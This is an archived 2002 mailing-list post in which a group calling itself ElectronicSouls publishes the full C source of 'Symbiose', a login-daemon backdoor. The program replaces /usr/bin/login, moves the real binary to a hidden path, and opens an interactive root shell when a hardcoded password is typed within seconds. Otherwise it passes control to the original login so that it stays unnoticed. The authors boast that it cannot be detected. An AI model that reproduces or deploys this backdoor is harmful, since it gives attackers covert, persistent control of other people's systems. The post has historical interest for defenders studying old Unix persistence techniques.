lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] - New Backdoor Technique

-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

Here's a backdoor we wrote a while ago that is 100% stealth and cannot
be detected.  Be warned that such a backdoor may have been installed on
your system, as we are the Immortal Blackhats.

# cat symbsd.c
/*
 * [ E l e c t r o n i c - S o u l s ]
 *
 * Symbiose - UNIX Deamon Backdoor
 * (C) BrainStorm
 *
 * you have 1 second to enter the passwd,
 * else it will execute the original deamon.
 *
 */

#include<signal.h>
#include<stdio.h>
#include<string.h>
#include<unistd.h>

#define ORIGINAL "/usr/bin/.login"  /* the new path of the original deamon execu
table. */
#define BACKDOOR "/usr/bin/login"   /* u can also back door other deamons of cou
rse ;) */
#define PASS "es"  /* u may want to change this password.. */

char **execute;
char passwd[3];


int main(int argc, char *argv[]) {

void connection();

signal(SIGALRM,connection);

  alarm(3);
    execute=argv;
    *execute=BACKDOOR;

  scanf("%s",passwd);

if(strcmp(passwd,PASS)==0) {
  alarm(0);
  printf("  ******************************************************************
 \n");
  printf("  ******************************************************************
 \n");
  printf("[ *** Welcome to Symbiose ;) -- (C) BrainStorm [ElectronicSouls] *** ]
 \n");
  printf("  ******************************************************************
 \n");
  printf("  ******************************************************************
 \n\n");

  execl("/bin/sh","/bin/sh","-i",0);
  execv("id",execute);

exit(0);
}
else
{
  execv(ORIGINAL,execute);
  exit(0);
}

}
void connection()
{
  execv(ORIGINAL,execute);
  exit(0);
}

#

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"We don't know Latin."

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3nmcEMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltRr4An0oFAwVWHvQF
D3Xz84s4c3PFwEkuAJoDkE+GhGc8QCZdV5Z/rwWl3LQH0w==
=0rBN
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2 

Big $$$ to be made with the HushMail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ